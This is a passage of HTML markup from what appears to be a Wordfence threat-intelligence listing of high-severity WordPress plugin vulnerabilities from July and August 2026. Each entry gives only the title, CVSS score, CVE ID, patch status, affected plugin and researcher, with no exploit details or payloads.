<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15025" target="_blank" rel="noopener noreferrer">							CVE-2026-15025						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/uncanny-automator" target="_blank" rel="noopener">Uncanny Automator – Easy Automation, Integration, Webhooks &amp; Workflow Builder Plugin</a> <span class="wfvr-software-slug">[uncanny-automator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d2de85470fb8bc914ee4f18ea34d49db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d2de85470fb8bc914ee4f18ea34d49db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener">thevietronin</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1bfa1538-7722-458d-a6a5-adde03e21e1a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4e88efe0-ffad-4d66-bb03-3f3a9dcbe5b1" target="_blank" rel="noopener">User Access Manager &lt;= 2.3.15 &#8211; Unauthenticated Arbitrary File Read via &#8216;uamgetfile&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18352" target="_blank" rel="noopener noreferrer">							CVE-2026-18352						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-access-manager" target="_blank" rel="noopener">User Access Manager</a> <span class="wfvr-software-slug">[user-access-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4e88efe0-ffad-4d66-bb03-3f3a9dcbe5b1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7320421b-6b88-452d-a363-a71cdf7953a6" target="_blank" rel="noopener">Web Directory Free &lt;= 1.7.13 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14785" target="_blank" rel="noopener noreferrer">							CVE-2026-14785						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/web-directory-free" target="_blank" rel="noopener">Web Directory Free</a> <span class="wfvr-software-slug">[web-directory-free]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nhien-pham-nhienit" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/dd648f7d75a7e7a46d7d82c57b085613.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd648f7d75a7e7a46d7d82c57b085613"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nhien-pham-nhienit" target="_blank" rel="noopener">Nhien Pham (nhienit)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d2de85470fb8bc914ee4f18ea34d49db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d2de85470fb8bc914ee4f18ea34d49db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener">thevietronin</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7320421b-6b88-452d-a363-a71cdf7953a6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9b6fe22-330a-4c24-9fdf-16f35516fb2a" target="_blank" rel="noopener">WP Fast Total Search &lt;= 1.80.280 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12741" target="_blank" rel="noopener noreferrer">							CVE-2026-12741						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fulltext-search" target="_blank" rel="noopener">WP Fast Total Search – The Power of Indexed Search</a> <span class="wfvr-software-slug">[fulltext-search]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9b6fe22-330a-4c24-9fdf-16f35516fb2a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6113e51e-d842-433a-ab0a-92ea108917a3" target="_blank" rel="noopener">WP OAuth Server ( Login with WordPress ) &lt;= 6.2.0 &#8211; Unauthenticated SQL Injection</a></h4>
<div class="cvss-score-badge">7.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.5 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65520" target="_blank" rel="noopener noreferrer">							CVE-2026-65520						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-oauth-20-server" target="_blank" rel="noopener">WP OAuth Server ( Login with WordPress )</a> <span class="wfvr-software-slug">[miniorange-oauth-20-server]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luis-koleski" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cacf4ee88693364dcf8ccac51b575d6b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cacf4ee88693364dcf8ccac51b575d6b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luis-koleski" target="_blank" rel="noopener">Luis Koleski</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6113e51e-d842-433a-ab0a-92ea108917a3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/76fb0ffd-32c1-483d-ae95-9bc70ba1c064" target="_blank" rel="noopener">Advanced Shipment Tracking for WooCommerce &lt;= 3.9 &#8211; Authenticated (Shop Manager+) SQL Injection via &#8216;tracking_provider&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-advanced-shipment-tracking" target="_blank" rel="noopener">Advanced Shipment Tracking for WooCommerce</a> <span class="wfvr-software-slug">[woo-advanced-shipment-tracking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-quang-truong-roll" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c2f379550a74607b173a9a120b640a71.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c2f379550a74607b173a9a120b640a71"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-quang-truong-roll" target="_blank" rel="noopener">Nguyen Truong (Roll)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/76fb0ffd-32c1-483d-ae95-9bc70ba1c064" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f419eceb-a3e7-4cf7-a37e-dcc57a26d7f5" target="_blank" rel="noopener">AffiliateWP &lt;= 2.35.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65515" target="_blank" rel="noopener noreferrer">							CVE-2026-65515						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/affiliate-wp" target="_blank" rel="noopener">AffiliateWP</a> <span class="wfvr-software-slug">[affiliate-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f419eceb-a3e7-4cf7-a37e-dcc57a26d7f5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6713c2dc-fc7f-4992-bde7-cfb94c383664" target="_blank" rel="noopener">AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress &lt;= 3.6.8 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65545" target="_blank" rel="noopener noreferrer">							CVE-2026-65545						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-engine" target="_blank" rel="noopener">AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress</a> <span class="wfvr-software-slug">[ai-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6713c2dc-fc7f-4992-bde7-cfb94c383664" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a831d5ae-cf20-4f6b-bc3c-214295ec8e2d" target="_blank" rel="noopener">Anti Spam and list cleaner – AcyChecker &lt;= 1.8.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65448" target="_blank" rel="noopener noreferrer">							CVE-2026-65448						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acychecker" target="_blank" rel="noopener">Anti Spam and list cleaner – AcyChecker</a> <span class="wfvr-software-slug">[acychecker]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/15c7bc3e71963fdd7c656346bcf8b159.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="15c7bc3e71963fdd7c656346bcf8b159"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/phuc-truong-huu" target="_blank" rel="noopener">Trương Hữu Phúc (truonghuuphuc)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a831d5ae-cf20-4f6b-bc3c-214295ec8e2d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2dfd592b-cbe9-460a-8b9a-148058d1bd58" target="_blank" rel="noopener">BackWPup &lt;= 5.7.4 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65443" target="_blank" rel="noopener noreferrer">							CVE-2026-65443						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup" target="_blank" rel="noopener">BackWPup – WordPress Backup &amp; Restore Plugin</a> <span class="wfvr-software-slug">[backwpup]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2dfd592b-cbe9-460a-8b9a-148058d1bd58" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9274957-7584-4df6-bb2a-d745510f5033" target="_blank" rel="noopener">Better Messages &lt;= 2.15.19 &#8211; Authenticated (Administrator+) Arbitrary File Deletion via Path Traversal via &#8216;file&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16585" target="_blank" rel="noopener noreferrer">							CVE-2026-16585						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bp-better-messages" target="_blank" rel="noopener">Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots</a> <span class="wfvr-software-slug">[bp-better-messages]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e9274957-7584-4df6-bb2a-d745510f5033" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/73809551-b925-4789-b059-b9e60743f693" target="_blank" rel="noopener">Booking Calendar &lt;= 11.4.2 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-59558" target="_blank" rel="noopener noreferrer">							CVE-2026-59558						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking" target="_blank" rel="noopener">Booking Calendar</a> <span class="wfvr-software-slug">[booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/73809551-b925-4789-b059-b9e60743f693" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01acb93b-89ae-4024-9f43-5fd14a7bd5f6" target="_blank" rel="noopener">Contest Gallery &lt;= 30.0.6 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65447" target="_blank" rel="noopener noreferrer">							CVE-2026-65447						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery" target="_blank" rel="noopener">Contest Gallery – Upload &amp; Vote Photos, Media, Sell with PayPal &amp; Stripe</a> <span class="wfvr-software-slug">[contest-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jayant-kamble" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cf19879c40314b138910d3ea903fbba3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cf19879c40314b138910d3ea903fbba3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jayant-kamble" target="_blank" rel="noopener">Jayant Kamble</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/01acb93b-89ae-4024-9f43-5fd14a7bd5f6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/07fda92e-a085-42c7-a16d-1eace1dee195" target="_blank" rel="noopener">Database for CF7 &lt;= 1.2.6 &#8211; Unauthenticated Stored Cross-Site Scripting via Array Form Field Values</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13425" target="_blank" rel="noopener noreferrer">							CVE-2026-13425						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/database-for-cf7" target="_blank" rel="noopener">Database for CF7</a> <span class="wfvr-software-slug">[database-for-cf7]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chawabhon-netisingha-jnx03" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01d45ecf2afce2efacfa60186c282224.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01d45ecf2afce2efacfa60186c282224"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chawabhon-netisingha-jnx03" target="_blank" rel="noopener">Chawabhon Netisingha (JNX03)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/07fda92e-a085-42c7-a16d-1eace1dee195" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
